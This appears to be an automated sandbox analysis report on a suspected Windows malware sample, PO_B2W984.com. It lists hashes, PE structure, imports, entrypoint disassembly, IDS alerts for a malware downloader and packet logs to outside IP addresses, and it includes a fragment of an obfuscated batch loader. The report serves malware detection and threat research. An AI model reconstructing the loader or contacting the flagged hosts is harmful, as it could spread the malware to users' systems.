                                                                                                                                      Entropy (8bit):4.658965888116939
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:wleG1594aKczJRP1dADCDswtJPZ9KZVst1U:LA4aLz08JaJ
                                                                                                                                      MD5:CCE3C4AEE8C122DD8C44E64BD7884D83
                                                                                                                                      SHA1:C555C812A9145E2CBC66C7C64BA754B0C7528D6D
                                                                                                                                      SHA-256:4A12ABB62DD0E5E1391FD51B7448EF4B9DA3B3DC83FF02FB111E15D6A093B5E8
                                                                                                                                      SHA-512:EA23EDFB8E3CDA49B78623F6CD8D0294A4F4B9B11570E8478864EBDEE39FCC6B8175B52EB947ED904BE27B5AF2535B9CA08595814557AE569020861A133D827D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.@echo off..@% %e%.%c%o..%h%. .......%o%r.r.r.....% %.......%o%..%f% .%f%o%..s%...... .%e%.r.%t%...o..r.% %.....%"%.......%u%.%T%r..%A%..%j%r........%=%.. o......%s%....o...%e%.....%t%.% %........%"%.r.......o%..%uTAj%"%.. . ..%N%.r r.... %U%... .oo...%M%r.........%j%.....%=%.....o....%=%.%"%r...... %..%uTAj%"% .....%m%..oo%X%.o.. %m%.....or.%w%....%O%.%g%.....%B%.o .r.. %W%..%D%........%t%o.r...%%NUMj%h% ...o.%t%..%t%o......o%p%.........%"% .r%..%uTAj%"% .... ..%G%...o.. ..%n%..rr..%j%..o......%D%...o .r..%R%r.

                                                                                                                                      Static File Info

                                                                                                                                      General

                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Entropy (8bit):7.486736694173577
                                                                                                                                      TrID:
                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 98.66%
                                                                                                                                      • Windows ActiveX control (116523/4) 1.15%
                                                                                                                                      • Windows Screen Saver (13104/52) 0.13%
                                                                                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                      File name:PO_B2W984.com
                                                                                                                                      File size:2'145'792 bytes
                                                                                                                                      MD5:f7d9ffe252e26320f26a76fc3f239c50
                                                                                                                                      SHA1:1b12238410d619f0797042ca0777d7c05b08f410
                                                                                                                                      SHA256:9654cbd553df628f50a99ec6f8b405901898c3c9eb99c8a3ba4fbd586290948b
                                                                                                                                      SHA512:7e83e17a42f8c2fc0a8743ad43ff592cbe48bebe075889c98091424e395c72c50f807de5746f8a5e9cb07466798af12462afc52edc5b3374f64ada3cce357ab9
                                                                                                                                      SSDEEP:49152:EdqswGco/j1HEFW1bB9HI8QrwiycY5vtxq5GtGco/j1HEFW1bB9HI8QrwiycY5vF:E8swjWdb1jWdbJ
                                                                                                                                      TLSH:8FA5D033E960D578ECBA37FC5C1752D8D44D3E752EDAF47D21DAAA841721B223868283
                                                                                                                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                                      File Icon

                                                                                                                                      Icon Hash:90cececece8e8eb0

                                                                                                                                      Static PE Info

                                                                                                                                      General

                                                                                                                                      Entrypoint:0x46380c
                                                                                                                                      Entrypoint Section:.itext
                                                                                                                                      Digitally signed:false
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      Subsystem:windows gui
                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                      DLL Characteristics:
                                                                                                                                      Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                                      TLS Callbacks:
                                                                                                                                      CLR (.Net) Version:
                                                                                                                                      OS Version Major:4
                                                                                                                                      OS Version Minor:0
                                                                                                                                      File Version Major:4
                                                                                                                                      File Version Minor:0
                                                                                                                                      Subsystem Version Major:4
                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                      Import Hash:c1249b2dc81238026e760db6b73b768c

                                                                                                                                      Entrypoint Preview

                                                                                                                                      Instruction
                                                                                                                                      push ebp
                                                                                                                                      mov ebp, esp
                                                                                                                                      add esp, FFFFFFF0h
                                                                                                                                      mov eax, 00462D44h
                                                                                                                                      call 00007FA398A57E7Dh
                                                                                                                                      mov eax, dword ptr [0052EF7Ch]
                                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                                      call 00007FA398AA537Dh
                                                                                                                                      mov ecx, dword ptr [0052ED90h]
                                                                                                                                      mov eax, dword ptr [0052EF7Ch]
                                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                                      mov edx, dword ptr [004628E4h]
                                                                                                                                      call 00007FA398AA537Dh
                                                                                                                                      mov eax, dword ptr [0052EF7Ch]
                                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                                      call 00007FA398AA53F1h
                                                                                                                                      call 00007FA398A55C60h
                                                                                                                                      lea eax, dword ptr [eax+00h]
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al

                                                                                                                                      Data Directories

                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x1340000x25ac.idata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x1400000xd4654.rsrc
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1390000x6cd8.reloc
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x1380000x18.rdata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x13471c0x5dc.idata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                      Sections

                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                      .text0x10000x61fe40x6200054bccdfb230aecbacc5dc4836bb40e62False0.5120401187818877data6.547957158295364IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                      .itext0x630000x8540xa00f9a41c84e5fdd4f1ee3395fb29f42e84False0.523828125data5.584231542920759IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                      .data0x640000xcb1200xcb20027dff9af1314283e7c0c621093c35f58False0.6564915865384615data7.465742401908973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                      .bss0x1300000x369c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                      .idata0x1340000x25ac0x2600902f126de362c99ae2b20adf830938cbFalse0.31938733552631576data5.045673551358589IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                      .tls0x1370000x340x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                      .rdata0x1380000x180x2004b2adcf7cfdd802a95428d44a20a5f89False0.05078125data0.2108262677871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                      .reloc0x1390000x6cd80x6e000278e681effa7fbcc52ec0b51ce696abFalse0.6368607954545454data6.6913122302764805IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                      .rsrc0x1400000xd46540xd4800523e395b34b9ab2a31c6f4a19f889cf4False0.6411638327205882data7.46297786535702IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                      Resources

                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                      RT_CURSOR0x140bd00x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                                                      RT_CURSOR0x140d040x134dataEnglishUnited States0.4642857142857143
                                                                                                                                      RT_CURSOR0x140e380x134dataEnglishUnited States0.4805194805194805
                                                                                                                                      RT_CURSOR0x140f6c0x134dataEnglishUnited States0.38311688311688313
                                                                                                                                      RT_CURSOR0x1410a00x134dataEnglishUnited States0.36038961038961037
                                                                                                                                      RT_CURSOR0x1411d40x134dataEnglishUnited States0.4090909090909091
                                                                                                                                      RT_CURSOR0x1413080x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                                                      RT_BITMAP0x14143c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                                                                                      RT_BITMAP0x14160c0x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                                                                                                                                      RT_BITMAP0x1417f00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                                                                                      RT_BITMAP0x1419c00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                                                                                                                                      RT_BITMAP0x141b900x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                                                                                                                                      RT_BITMAP0x141d600x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                                                                                                                                      RT_BITMAP0x141f300x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                                                                                                                                      RT_BITMAP0x1421000x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                                                                                      RT_BITMAP0x1422d00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                                                                                                                                      RT_BITMAP0x1424a00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                                                                                      RT_BITMAP0x1426700xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                                                                                                                                      RT_ICON0x1427580x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 1889 x 1889 px/m0.4104609929078014
                                                                                                                                      RT_ICON0x142bc00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 1889 x 1889 px/m0.2815573770491803
                                                                                                                                      RT_ICON0x1435480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 1889 x 1889 px/m0.20567542213883677
                                                                                                                                      RT_ICON0x1445f00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 1889 x 1889 px/m0.14844398340248963
                                                                                                                                      RT_ICON0x146b980x15efPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9403383793410508
                                                                                                                                      RT_DIALOG0x1481880x52data0.7682926829268293
                                                                                                                                      RT_DIALOG0x1481dc0x52data0.7560975609756098
                                                                                                                                      RT_STRING0x1482300x29cdata0.4505988023952096
                                                                                                                                      RT_STRING0x1484cc0x2b4data0.476878612716763
                                                                                                                                      RT_STRING0x1487800xb4data0.6888888888888889
                                                                                                                                      RT_STRING0x1488340xe8data0.6422413793103449
                                                                                                                                      RT_STRING0x14891c0x2a8data0.4764705882352941
                                                                                                                                      RT_STRING0x148bc40x3e8data0.382
                                                                                                                                      RT_STRING0x148fac0x370data0.4022727272727273
                                                                                                                                      RT_STRING0x14931c0x3ccdata0.33539094650205764
                                                                                                                                      RT_STRING0x1496e80x214data0.49624060150375937
                                                                                                                                      RT_STRING0x1498fc0xccdata0.6274509803921569
                                                                                                                                      RT_STRING0x1499c80x194data0.5643564356435643
                                                                                                                                      RT_STRING0x149b5c0x3c4data0.3288381742738589
                                                                                                                                      RT_STRING0x149f200x338data0.42961165048543687
                                                                                                                                      RT_STRING0x14a2580x294data0.42424242424242425
                                                                                                                                      RT_RCDATA0x14a4ec0x10data1.5
                                                                                                                                      RT_RCDATA0x14a4fc0x368data0.7029816513761468
                                                                                                                                      RT_RCDATA0x14a8640xc9301GIF image data, version 89a, 384 x 288EnglishUnited States0.6578109736489234
                                                                                                                                      RT_RCDATA0x213b680x188Delphi compiled form 'TMainForm'0.7168367346938775
                                                                                                                                      RT_GROUP_CURSOR0x213cf00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                      RT_GROUP_CURSOR0x213d040x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                      RT_GROUP_CURSOR0x213d180x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                      RT_GROUP_CURSOR0x213d2c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                      RT_GROUP_CURSOR0x213d400x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                      RT_GROUP_CURSOR0x213d540x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                      RT_GROUP_CURSOR0x213d680x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                      RT_GROUP_ICON0x213d7c0x4cdata0.8289473684210527
                                                                                                                                      RT_VERSION0x213dc80x88cdataEnglishUnited States0.2180073126142596

                                                                                                                                      Imports

                                                                                                                                      DLLImport
                                                                                                                                      oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                                      advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                                                      user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                                                                                                                                      kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                                                                                                      kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                                                      user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                                                      gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
                                                                                                                                      version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                                                                      kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryExA, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                                                                                      advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                                                                                                                                      oleaut32.dllCreateErrorInfo, GetErrorInfo, SetErrorInfo, SysFreeString
                                                                                                                                      ole32.dllCoCreateInstance, CoUninitialize, CoInitialize
                                                                                                                                      kernel32.dllSleep
                                                                                                                                      oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                                                                                      comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create

                                                                                                                                      Possible Origin

                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                      EnglishUnited States

                                                                                                                                      Network Behavior

                                                                                                                                      Suricata IDS Alerts

                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                      2025-01-03T02:47:08.540332+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.204974741.185.8.252443TCP
                                                                                                                                      2025-01-03T02:47:14.889412+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.11.2049748132.226.8.16980TCP

                                                                                                                                      Network Port Distribution

                                                                                                                                      TCP Packets

                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Jan 3, 2025 02:47:07.777347088 CET49746443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:07.777426004 CET4434974641.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:07.777565956 CET49746443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:07.778639078 CET49746443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:07.778702974 CET4434974641.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:07.778846979 CET49746443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:07.798082113 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:07.798106909 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:07.798398018 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:07.800714970 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:07.800734043 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:08.540020943 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:08.540332079 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:08.544358969 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:08.544374943 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:08.544713020 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:08.572139025 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:08.614212990 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:09.257642984 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:09.257666111 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:09.257829905 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:09.257846117 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:09.306694031 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:09.617723942 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:09.617732048 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:09.618010044 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:09.618062019 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:09.621902943 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:09.621911049 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:09.622133017 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:09.622278929 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:09.622648001 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:09.622656107 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:09.622920990 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:09.660787106 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:09.660793066 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:09.661128998 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:09.982264042 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:09.982269049 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:09.982533932 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:09.983028889 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:09.983221054 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:09.983407021 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:09.983767033 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:09.984002113 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:09.984427929 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:09.984577894 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:09.984664917 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:09.985135078 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:09.985300064 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:09.985394955 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.021523952 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:10.021655083 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.021771908 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.063355923 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:10.063539982 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.063601971 CET49747443192.168.11.2041.185.8.252
